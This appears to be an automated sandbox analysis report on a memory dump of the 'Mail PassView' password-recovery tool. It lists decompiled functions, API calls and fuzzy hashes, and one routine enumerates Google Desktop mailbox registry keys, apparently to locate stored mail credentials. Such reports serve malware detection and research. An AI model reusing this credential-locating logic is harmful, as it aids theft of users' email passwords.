Instruction Fuzzy Hash: BC01A77290011976D721A759CC46FDA7B6C9F44304F0400FAB509B3192DB789F858BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00408572, Relevance: 7.5, APIs: 5, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00408572(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x24));
				if(_t9 != 0) {
					_push(_t9);
					L004115D6();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x34));
				if(_t10 != 0) {
					_push(_t10);
					L004115D6();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x1b4));
				if(_t11 != 0) {
					_push(_t11);
					L004115D6();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x1a0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L004115D6();
						 *_t18 = 0;
					}
					_push(_t18);
					L004115D6();
				}
				 *((intOrPtr*)(_t19 + 0x1a0)) = 0;
				 *((intOrPtr*)(_t19 + 0x24)) = 0;
				 *((intOrPtr*)(_t19 + 0x34)) = 0;
				 *((intOrPtr*)(_t19 + 0x1b4)) = 0;
				return _t11;
			}

0x00408572
0x00408572
0x0040857b
0x0040857d
0x0040857e
0x00408583
0x00408584
0x00408589
0x0040858b
0x0040858c
0x00408591
0x00408592
0x0040859a
0x0040859c
0x0040859d
0x004085a2
0x004085a3
0x004085ab
0x004085ad
0x004085b1
0x004085b3
0x004085b4
0x004085ba
0x004085ba
0x004085bc
0x004085bd
0x004085c2
0x004085c4
0x004085ca
0x004085cd
0x004085d0
0x004085d7

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040857E
??3@YAXPAX@Z.MSVCRT ref: 0040858C
??3@YAXPAX@Z.MSVCRT ref: 0040859D
??3@YAXPAX@Z.MSVCRT ref: 004085B4
??3@YAXPAX@Z.MSVCRT ref: 004085BD

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
Instruction ID: 0a64c6e0650ef7a992325d71cca8afebdafc0e64b7e6075a64aa0ecb46f153ec
Opcode Fuzzy Hash: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
Instruction Fuzzy Hash: C2F0F4725057016FDB209F6A99C0497B7D6BB48714B64083FF18AD3741CF78AD818A18

Uniqueness

Uniqueness Score: -1.00%

Function 004085D8, Relevance: 7.5, APIs: 5, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E004085D8(intOrPtr* __edi) {
				void* __esi;
				void** _t7;
				intOrPtr* _t12;
				intOrPtr* _t18;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;

				_t18 = __edi;
				 *__edi = 0x413320;
				E00408572(__edi);
				_t21 =  *((intOrPtr*)(__edi + 0x10));
				if(_t21 != 0) {
					E00406B5B(_t21);
					_push(_t21);
					L004115D6();
				}
				_t22 =  *((intOrPtr*)(_t18 + 0xc));
				if(_t22 != 0) {
					E00406B5B(_t22);
					_push(_t22);
					L004115D6();
				}
				_t23 =  *((intOrPtr*)(_t18 + 8));
				if(_t23 != 0) {
					E00406B5B(_t23);
					_push(_t23);
					L004115D6();
				}
				_t24 =  *((intOrPtr*)(_t18 + 4));
				if(_t24 != 0) {
					E00406B5B(_t24);
					_push(_t24);
					L004115D6();
				}
				_t12 = _t18;
				_t7 =  *((intOrPtr*)( *_t12))();
				free( *_t7);
				return _t7;
			}

0x004085d8
0x004085db
0x004085e1
0x004085e6
0x004085eb
0x004085ed
0x004085f2
0x004085f3
0x004085f8
0x004085f9
0x004085fe
0x00408600
0x00408605
0x00408606
0x0040860b
0x0040860c
0x00408611
0x00408613
0x00408618
0x00408619
0x0040861e
0x0040861f
0x00408624
0x00408626
0x0040862b
0x0040862c
0x00408631
0x00408632
0x0040863c
0x00408640
0x00408646

APIs

Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040857E
Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040858C
Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040859D
Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085B4
Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085BD

??3@YAXPAX@Z.MSVCRT ref: 004085F3
??3@YAXPAX@Z.MSVCRT ref: 00408606
??3@YAXPAX@Z.MSVCRT ref: 00408619
??3@YAXPAX@Z.MSVCRT ref: 0040862C
free.MSVCRT(00000000), ref: 00408640

Part of subcall function 00406B5B: free.MSVCRT(00000000,00406DE2,00000000,?,?), ref: 00406B62

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ??3@$free
String ID:
API String ID: 2241099983-0
Opcode ID: 0216321c22edde0e428b6460b65a4d9d3fdf50d22b04996e8803d6d71622e83e
Instruction ID: 9ddd328a78e70669a2f2a4495a49ad6ad9a3331e0dda25fcf26d4743fc91c851
Opcode Fuzzy Hash: 0216321c22edde0e428b6460b65a4d9d3fdf50d22b04996e8803d6d71622e83e
Instruction Fuzzy Hash: E3F0F6729028306BC9213B275011A8EB3657D4171431B056FF946BB7A28F3C6E9246FD

Uniqueness

Uniqueness Score: -1.00%

Function 0040E81A, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E0040E81A(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, intOrPtr _a12) {
				void* __esi;
				void* _t11;
				void* _t26;
				void* _t27;

				_t26 = __edx;
				_t11 = _a4 - 0x110;
				_t27 = __ecx;
				if(_t11 == 0) {
					E0040E4A4(__ecx, __ecx, __eflags);
					E00406491(_t26,  *((intOrPtr*)(__ecx + 4)));
					L5:
					return E004015AE(_t27, _a4, _a8, _a12);
				}
				if(_t11 != 0x28 || E004062D1(_a12) == 0) {
					goto L5;
				} else {
					SetBkMode(_a8, 1);
					SetBkColor(_a8, GetSysColor(5));
					SetTextColor(_a8, 0xc00000);
					return GetSysColorBrush(5);
				}
			}

0x0040e81a
0x0040e820
0x0040e826
0x0040e828
0x0040e871
0x0040e879
0x0040e87f
0x00000000
0x0040e88a
0x0040e82d
0x00000000
0x0040e83c
0x0040e841
0x0040e853
0x0040e861
0x00000000
0x0040e869

APIs

Part of subcall function 004062D1: memset.MSVCRT ref: 004062F1
Part of subcall function 004062D1: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406304
Part of subcall function 004062D1: _stricmp.MSVCRT(00000000,edit), ref: 00406316

SetBkMode.GDI32(?,00000001), ref: 0040E841
GetSysColor.USER32(00000005), ref: 0040E849
SetBkColor.GDI32(?,00000000), ref: 0040E853
SetTextColor.GDI32(?,00C00000), ref: 0040E861
GetSysColorBrush.USER32(00000005), ref: 0040E869

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Color$BrushClassModeNameText_stricmpmemset
String ID:
API String ID: 1869857563-0
Opcode ID: fa2efa1d352e815f872068aeb743c84bb0f55ba64056062ab12fb6989f15ddc0
Instruction ID: 70d3a7b2db974a4d4567ef1bfe72cf66993607b5e30e9ab541cb73924f0fe55d
Opcode Fuzzy Hash: fa2efa1d352e815f872068aeb743c84bb0f55ba64056062ab12fb6989f15ddc0
Instruction Fuzzy Hash: 8CF01D32100205BBDF152FA6DD09E9E3F25EF08711F10C53AFA19A51E1CAB5D970DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B105, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040B105(intOrPtr __ecx, short _a4, short _a8) {
				char _v265;
				char _v520;
				char _v532;
				RECT* _v540;
				char _v560;
				intOrPtr _v564;
				char _v568;
				intOrPtr _v572;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t54;
				void* _t77;
				short _t85;
				short _t86;
				RECT* _t97;
				intOrPtr _t104;

				_t93 = __ecx;
				_t97 = 0;
				_t104 = __ecx;
				_v564 = __ecx;
				if(_a4 == 0 || _a4 == 1) {
					_t85 = _a8;
					if(_t85 == 0x9c42) {
						_t54 = DestroyWindow( *(_t104 + 0x108));
					}
					_t114 = _t85 - 0x9c49;
					if(_t85 == 0x9c49) {
						_t54 = E0040AEAA(_t93, _t97, _t104, _t114);
					}
					_t115 = _t85 - 0x9c59;
					if(_t85 == 0x9c59) {
						_t54 = E0040AE70(_t97, _t104, _t115);
					}
					_t116 = _t85 - 0x9c56;
					if(_t85 == 0x9c56) {
						_t54 = E0040ADB3(_t104, _t116);
					}
					if(_a8 == 0x9c58) {
						 *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) ^ 0x00000001;
						_t54 = E0040A27F(0, _t93, _t104, 0);
					}
					if(_a8 == 0x9c44) {
						_t54 = E0040AD9D(_t104);
					}
					if(_a8 == 0x9c43) {
						_v532 = 0x413560;
						E00401000(_t93,  &_v520, 0x412404);
						E00401000(_t93,  &_v265, 0x412440);
						_t104 = _v564;
						_push( *(_t104 + 0x108));
						_push( &_v532);
						_t77 = 0x70;
						E00401540(_t77);
						SetFocus( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
						_t20 =  &_v540; // 0x413560
						_t54 = E0040143D(_t20);
						_t97 = 0;
					}
					_t86 = _a8;
					_t122 = _t86 - 0x9c41;
					if(_t86 == 0x9c41) {
						_t54 = E0040AD38(_t104, _t93, _t122);
					}
					if(_t86 != 0x9c47) {
						L23:
						__eflags = _t86 - 0x9c4f;
						if(_t86 != 0x9c4f) {
							L27:
							__eflags = _t86 - 0x9c48;
							if(_t86 == 0x9c48) {
								_t54 = E0040AC8A(_t104, _t86);
							}
							__eflags = _t86 - 0x9c45;
							if(__eflags == 0) {
								_t100 = _t104 + 0x36c;
								 *( *(_t104 + 0x36c) + 4) =  *( *(_t104 + 0x36c) + 4) ^ 0x00000001;
								E0040A27F(0, _t93, _t104, __eflags);
								_t93 = 1;
								_t54 = E0040A00B( *((intOrPtr*)(_t104 + 0x370)), 1,  *((intOrPtr*)( *_t100 + 4)));
								_t97 = 0;
								__eflags = 0;
							}
							__eflags = _a8 - 0x9c46;
							if(__eflags == 0) {
								_t54 = E0040B095(_t104, __eflags, _t97);
							}
							__eflags = _a8 - 0x9c5c;
							if(_a8 == 0x9c5c) {
								 *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) ^ 0x00000001;
								__eflags = 0;
								E0040A27F(0, _t93, _t104, 0);
								E0040A437(_t104);
								_t54 = InvalidateRect( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184), _t97, _t97);
							}
							__eflags = _a8 - 0x9c4a;
							if(__eflags == 0) {
								_t54 = E0040B095(_t104, __eflags, 1);
							}
							__eflags = _a8 - 0x9c4b;
							if(_a8 == 0x9c4b) {
								_v540 = _t97;
								_v560 = 0x412ff4;
								E00405960( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b4)),  &_v560,  *(_t104 + 0x108),  *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
								_v568 = 0x412ff4;
								_t54 = E0040143D( &_v560);
								_t104 = _v572;
							}
							__eflags = _a8 - 0x9c4c;
							if(_a8 == 0x9c4c) {
								_t54 = E00408C3E( *((intOrPtr*)(_t104 + 0x370)));
							}
							__eflags = _a8 - 0x9c4e;
							if(_a8 == 0x9c4e) {
								_t54 = E00409C78( *((intOrPtr*)(_t104 + 0x370)),  *(_t104 + 0x108));
							}
							goto L43;
						}
						_t72 =  *((intOrPtr*)(_t104 + 0x370));
						__eflags =  *((intOrPtr*)(_t72 + 0x1b8)) - _t97;
						if( *((intOrPtr*)(_t72 + 0x1b8)) == _t97) {
							_t54 = E00408654(_t72, 0xffffffff, _t97, 2);
							goto L27;
						}
						_push(0xf000);
						_push(0x1000);
						goto L21;
					} else {
						_t72 =  *((intOrPtr*)(_t104 + 0x370));
						if( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b8)) == _t97) {
							_t54 = E00408654(_t72, 0xffffffff, 2, 2);
							goto L23;
						}
						_push(0xf000);
						_push(0x2000);
						L21:
						_push(0xffffffff);
						_t54 = E00408654(_t72);
						goto L43;
					}
				} else {
					L43:
					return _t54;
				}
			}

0x0040b105
0x0040b114
0x0040b11a
0x0040b11c
0x0040b120
0x0040b12d
0x0040b136
0x0040b13e
0x0040b13e
0x0040b144
0x0040b149
0x0040b14b
0x0040b14b
0x0040b150
0x0040b155
0x0040b157
0x0040b157
0x0040b15c
0x0040b161
0x0040b165
0x0040b165
0x0040b170
0x0040b178
0x0040b17e
0x0040b17e
0x0040b189
0x0040b18d
0x0040b18d
0x0040b198
0x0040b1a3
0x0040b1ab
0x0040b1bc
0x0040b1c1
0x0040b1c5
0x0040b1cf
0x0040b1d2
0x0040b1d3
0x0040b1e4
0x0040b1ea
0x0040b1ee
0x0040b1f3
0x0040b1f3
0x0040b1f5
0x0040b1f9
0x0040b1fe
0x0040b202
0x0040b202
0x0040b20c
0x0040b23d
0x0040b23d
0x0040b242
0x0040b268
0x0040b268
0x0040b26d
0x0040b271
0x0040b271
0x0040b276
0x0040b27b
0x0040b27d
0x0040b285
0x0040b28b
0x0040b29d
0x0040b29e
0x0040b2a3
0x0040b2a3
0x0040b2a3
0x0040b2a5
0x0040b2ab
0x0040b2b0
0x0040b2b0
0x0040b2b5
0x0040b2bb
0x0040b2c3
0x0040b2c7
0x0040b2c9
0x0040b2ce
0x0040b2e1
0x0040b2e1
0x0040b2e7
0x0040b2ed
0x0040b2f3
0x0040b2f3
0x0040b2f8
0x0040b2fe
0x0040b306
0x0040b30f
0x0040b329
0x0040b330
0x0040b334
0x0040b339
0x0040b339
0x0040b33d
0x0040b343
0x0040b34b
0x0040b34b
0x0040b350
0x0040b356
0x0040b364
0x0040b364
0x00000000
0x0040b356
0x0040b244
0x0040b24a
0x0040b250
0x0040b263
0x00000000
0x0040b263
0x0040b252
0x0040b257
0x00000000
0x0040b20e
0x0040b20e
0x0040b21a
0x0040b238
0x00000000
0x0040b238
0x0040b21c
0x0040b221
0x0040b226
0x0040b226
0x0040b228
0x00000000
0x0040b228
0x0040b369
0x0040b369
0x0040b36f
0x0040b36f

APIs

DestroyWindow.USER32(?), ref: 0040B13E
SetFocus.USER32(?,?,?), ref: 0040B1E4
InvalidateRect.USER32(?,00000000,00000000), ref: 0040B2E1

Strings

`5A, xrefs: 0040B1EA

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: DestroyFocusInvalidateRectWindow
String ID: `5A
API String ID: 3502187192-343712130
Opcode ID: 4c3d990881eba3cf74bda8571d7f9b3248234962b7985cf1d53a89f59e718e54
Instruction ID: 7dc3b259c8ef6dbe6f4b6ee630ad47b8a618685bd7b93527759b10f323b3e488
Opcode Fuzzy Hash: 4c3d990881eba3cf74bda8571d7f9b3248234962b7985cf1d53a89f59e718e54
Instruction Fuzzy Hash: 2B519130A043019BCB25BF658845E9AB3E0EF54724F44C57FF4696F2E1CB7999818B8E

Uniqueness

Uniqueness Score: -1.00%

Function 00409B32, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00409B32(intOrPtr* __eax, void* __edx, void* __edi, void* __eflags, char* _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				void* __ebx;
				void* __esi;
				void* _t33;
				void* _t63;
				void* _t65;
				void* _t80;
				void* _t81;
				intOrPtr _t82;
				void* _t84;
				intOrPtr* _t86;

				_t81 = __edi;
				_t80 = __edx;
				_push(_t68);
				_v12 = _v12 & 0x00000000;
				_t86 = __eax;
				E0040892D(__eax, __eflags);
				_t32 = _a4;
				if( *_a4 == 0) {
					_t33 = GetStdHandle(0xfffffff5);
				} else {
					_t33 = E00405EE4(_t32);
				}
				_t63 = _t33;
				_v8 = _t33;
				if(_t63 == 0xffffffff) {
					__eflags = 0;
					E00405F41(0, 0);
					goto L31;
				} else {
					_push(_t81);
					_v12 = 1;
					E00405E2C();
					_t82 = _a8;
					if(_t82 == 4 || _t82 == 5) {
						 *((intOrPtr*)( *_t86 + 0x50))(_t63, _t82);
					}
					if(_t82 == 6) {
						 *((intOrPtr*)( *_t86 + 0x24))(_t63);
					}
					 *((intOrPtr*)( *_t86 + 0x80))(_t63, _t82);
					if(_t82 != 2) {
						L12:
						if(_t82 == 7 &&  *((intOrPtr*)(_t86 + 0x1bc)) != 0) {
							E004091CB(_t86, _t80, _t86, _v8, 0);
						}
						goto L15;
					} else {
						if( *((intOrPtr*)(_t86 + 0x1bc)) == 0) {
							L15:
							_t65 = 0;
							if( *((intOrPtr*)(_t86 + 0x28)) <= 0) {
								L22:
								if(_t82 == 4 || _t82 == 5) {
									 *((intOrPtr*)( *_t86 + 0x4c))(_v8, _t82);
								}
								if(_t82 == 6) {
									 *((intOrPtr*)( *_t86 + 0x28))(_v8);
								}
								if( *_a4 != 0) {
									CloseHandle(_v8);
								}
								SetCursor( *0x416b98);
								L31:
								return _v12;
							} else {
								goto L16;
							}
							do {
								L16:
								_t84 =  *((intOrPtr*)( *_t86 + 0x64))(_t65);
								_push(_t84);
								if( *((intOrPtr*)( *_t86 + 0x2c))() == 0) {
									goto L18;
								}
								_push(_a8);
								_push(_t84);
								_push(_v8);
								if( *((intOrPtr*)( *_t86 + 0x78))() == 0) {
									_v12 = _v12 & 0x00000000;
									__eflags = 0;
									E00405F41(0, 0);
									L21:
									_t82 = _a8;
									goto L22;
								}
								L18:
								_t65 = _t65 + 1;
							} while (_t65 <  *((intOrPtr*)(_t86 + 0x28)));
							goto L21;
						}
						E004090AE(0, _t86, _t63);
						goto L12;
					}
				}
			}

0x00409b32
0x00409b32
0x00409b36
0x00409b37
0x00409b3d
0x00409b41
0x00409b46
0x00409b4c
0x00409b59
0x00409b4e
0x00409b4f
0x00409b54
0x00409b5f
0x00409b64
0x00409b67
0x00409c67
0x00409c69
0x00000000
0x00409b6d
0x00409b6d
0x00409b6e
0x00409b75
0x00409b7a
0x00409b80
0x00409b8d
0x00409b8d
0x00409b93
0x00409b9a
0x00409b9a
0x00409ba3
0x00409bac
0x00409bbf
0x00409bc2
0x00409bd4
0x00409bd4
0x00000000
0x00409bae
0x00409bb5
0x00409bd9
0x00409bd9
0x00409bde
0x00409c21
0x00409c24
0x00409c33
0x00409c33
0x00409c3a
0x00409c43
0x00409c43
0x00409c4c
0x00409c51
0x00409c51
0x00409c5d
0x00409c6f
0x00409c75
0x00000000
0x00000000
0x00000000
0x00409be0
0x00409be0
0x00409be8
0x00409bec
0x00409bf4
0x00000000
0x00000000
0x00409bf6
0x00409bfb
0x00409bfc
0x00409c06
0x00409c10
0x00409c16
0x00409c18
0x00409c1e
0x00409c1e
0x00000000
0x00409c1e
0x00409c08
0x00409c08
0x00409c09
0x00000000
0x00409c0e
0x00409bba
0x00000000
0x00409bba
0x00409bac

APIs

Part of subcall function 0040892D: ??2@YAPAXI@Z.MSVCRT ref: 0040894E
Part of subcall function 0040892D: ??3@YAXPAX@Z.MSVCRT ref: 00408A15

GetStdHandle.KERNEL32(000000F5,00000000,00000000,00412466,00412466,?,0040B99D,00412466,00000000,00000000,?,00000000,00000000,?,?), ref: 00409B59
CloseHandle.KERNEL32(00000000,0040B99D,00412466,00000000,00000000,?,00000000,00000000,?,?,?,0040BAC6), ref: 00409C51
SetCursor.USER32(0040B99D,00412466,00000000,00000000,?,00000000,00000000,?,?,?,0040BAC6), ref: 00409C5D

Part of subcall function 00405EE4: CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,00409B54,00000000,00000000,00000000,00412466,00412466,?,0040B99D,00412466), ref: 00405EF6

Part of subcall function 00405F41: GetLastError.KERNEL32(?), ref: 00405F51
Part of subcall function 00405F41: sprintf.MSVCRT ref: 00405F79
Part of subcall function 00405F41: MessageBoxA.USER32 ref: 00405F92

Strings

Mt, xrefs: 00409C1E, 00409C2D

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Handle$??2@??3@CloseCreateCursorErrorFileLastMessagesprintf
String ID: Mt
API String ID: 3976026410-2848310829
Opcode ID: 2c9854ed93d1f72c3aad61d805639b1b57b777b5d2feb142488b69294c3f009d
Instruction ID: 76c06303e14c6b04a2110271ee515dff56d5a0df9a91191aa293361483897b91
Opcode Fuzzy Hash: 2c9854ed93d1f72c3aad61d805639b1b57b777b5d2feb142488b69294c3f009d
Instruction Fuzzy Hash: AB41B430B04100AFDB219F69D888F5E77F5BF49320F21446AF546A72E2CB78AD80CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00405CEE, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00405CEE(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t29;
				struct HDWP__* _t30;
				RECT* _t58;
				intOrPtr _t66;

				_push(__ecx);
				_push(__ecx);
				_t66 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0x24) {
						if(_a4 == 0xf) {
							E0040173B(__ecx + 0xc);
						}
					} else {
						_t29 = _a12;
						 *((intOrPtr*)(_t29 + 0x18)) = 0x190;
						 *((intOrPtr*)(_t29 + 0x1c)) = 0xb4;
					}
				} else {
					_t30 = BeginDeferWindowPos(0xb);
					_t58 = _t66 + 0xc;
					_v8 = _t30;
					E0040169B(_t58, _t30, 0x3ed, 0, 0, 1);
					E0040169B(_t58, _v8, 0x3ee, 0, 0, 1);
					E0040169B(_t58, _v8, 0x3f4, 0, 0, 1);
					E0040169B(_t58, _v8, 0x3ef, 0, 0, 1);
					E0040169B(_t58, _v8, 0x3f0, 1, 0, 0);
					E0040169B(_t58, _v8, 0x3f1, 1, 0, 0);
					E0040169B(_t58, _v8, 0x3f5, 1, 0, 0);
					E0040169B(_t58, _v8, 0x3f2, 1, 0, 0);
					E0040169B(_t58, _v8, 0x3f3, 1, 1, 0);
					E0040169B(_t58, _v8, 1, 1, 1, 0);
					E0040169B(_t58, _v8, 2, 1, 1, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t58 + 0x10), _t58, 1);
					_t66 = _v12;
				}
				return E004015AE(_t66, _a4, _a8, _a12);
			}

0x00405cf1
0x00405cf2
0x00405cf9
0x00405cfb
0x00405cfe
0x00405df3
0x00405e0c
0x00405e11
0x00405e11
0x00405df5
0x00405df5
0x00405df8
0x00405dff
0x00405dff
0x00405d04
0x00405d07
0x00405d0f
0x00405d1d
0x00405d23
0x00405d35
0x00405d47
0x00405d59
0x00405d6b
0x00405d7d
0x00405d8f
0x00405da1
0x00405db3
0x00405dc1
0x00405dd0
0x00405dd8
0x00405de3
0x00405de9
0x00405dec
0x00405e29

APIs

BeginDeferWindowPos.USER32 ref: 00405D07

Part of subcall function 0040169B: GetDlgItem.USER32 ref: 004016AB
Part of subcall function 0040169B: GetClientRect.USER32 ref: 004016BD
Part of subcall function 0040169B: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401727

EndDeferWindowPos.USER32(?), ref: 00405DD8
InvalidateRect.USER32(?,?,00000001), ref: 00405DE3

Strings

$, xrefs: 00405DEF

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeferWindow$Rect$BeginClientInvalidateItem
String ID: $
API String ID: 2498372239-3993045852
Opcode ID: eed8279c3271f2b27814900a34917ae49580b819969905b4e3b00ee4e388fd63
Instruction ID: 46e20a5f719da2480e3b09a58904212cef45bdfb275aa5f1a4c21840a4711c1e
Opcode Fuzzy Hash: eed8279c3271f2b27814900a34917ae49580b819969905b4e3b00ee4e388fd63
Instruction Fuzzy Hash: EB316D30641254BBCB216F13DD49D9F3F7CEF86BA4F10483DB409762A1C6798E10DAA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040719C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040719C(void* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				char _v264;
				void* _v268;
				void* _v276;
				long _t17;
				void* _t21;
				void* _t24;
				void* _t29;
				int _t32;
				signed int _t36;
				void* _t39;
				void* _t40;
				void* _t41;

				_t29 = __ecx;
				_t17 = E0040EB3F(0x80000001, "Software\\Google\\Google Desktop\\Mailboxes",  &_v268);
				_t39 = (_t36 & 0xfffffff8) - 0x108 + 0xc;
				if(_t17 == 0) {
					_t32 = 0;
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_t40 = _t39 + 0xc;
					_t21 = E0040EC05(_v268, 0,  &_v260);
					while(1) {
						_t41 = _t40 + 0xc;
						if(_t21 != 0) {
							break;
						}
						_t24 = E0040EB3F(_v268,  &_v260,  &_v264);
						_t40 = _t41 + 0xc;
						if(_t24 == 0) {
							E0040706C(_t29, _a4, _v264,  &_v260);
							RegCloseKey(_v276);
						}
						_t32 = _t32 + 1;
						_t21 = E0040EC05(_v268, _t32,  &_v260);
					}
					_t17 = RegCloseKey(_v268);
				}
				return _t17;
			}

0x0040719c
0x004071b9
0x004071be
0x004071c3
0x004071ca
0x004071d2
0x004071d7
0x004071dc
0x004071e9
0x00407237
0x00407237
0x0040723c
0x00000000
0x00000000
0x00407204
0x00407209
0x0040720e
0x0040721c
0x00407225
0x00407225
0x0040722c
0x00407232
0x00407232
0x00407242
0x00407242
0x00407249

APIs

Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52

memset.MSVCRT ref: 004071D7

Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28

RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 00407225
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 00407242

Strings

Software\Google\Google Desktop\Mailboxes, xrefs: 004071AF

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Close$EnumOpenmemset
String ID: Software\Google\Google Desktop\Mailboxes
API String ID: 2255314230-2212045309
Opcode ID: 452db49ed067e6e6e63c10348168c8f88923fb1a9b6aea3e0d2cfe22e4762b25
Instruction ID: abca04dfe3767426288f52b4a512d9ce3e2bfadbcd13eaa8a3c626f28e0c8a54
Opcode Fuzzy Hash: 452db49ed067e6e6e63c10348168c8f88923fb1a9b6aea3e0d2cfe22e4762b25
Instruction Fuzzy Hash: A71142728083456BD710EE52DC01EAB7BECEB84344F04093EF995E1191E735E628DAA7

Uniqueness

Uniqueness Score: -1.00%

Function 0040B70A, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B70A(void* __esi) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t15;
				struct HWND__* _t20;

				_t15 =  *0x416b94; // 0x400000
				_v44.hInstance = _t15;
				_v44.hIcon =  *((intOrPtr*)(__esi + 0x104));
				_v44.lpszClassName = __esi + 4;
				_v44.style = 0;
				_v44.lpfnWndProc = E004017C1;
				_v44.cbClsExtra = 0;
				_v44.cbWndExtra = 0;
				_v44.hCursor = 0;
				_v44.hbrBackground = 0x10;
				_v44.lpszMenuName = 0;
				RegisterClassA( &_v44);
				_t20 = CreateWindowExA(0, "MailPassView", "Mail PassView", 0xcf0000, 0, 0, 0x280, 0x1e0, 0, 0,  *0x416b94, __esi);
				 *(__esi + 0x108) = _t20;
				return _t20;
			}

0x0040b710
0x0040b715
0x0040b71e
0x0040b727
0x0040b72e
0x0040b731
0x0040b738
0x0040b73b
0x0040b73e
0x0040b741
0x0040b748
0x0040b74b
0x0040b776
0x0040b77c
0x0040b784

APIs

RegisterClassA.USER32 ref: 0040B74B
CreateWindowExA.USER32 ref: 0040B776

Strings

MailPassView, xrefs: 0040B770
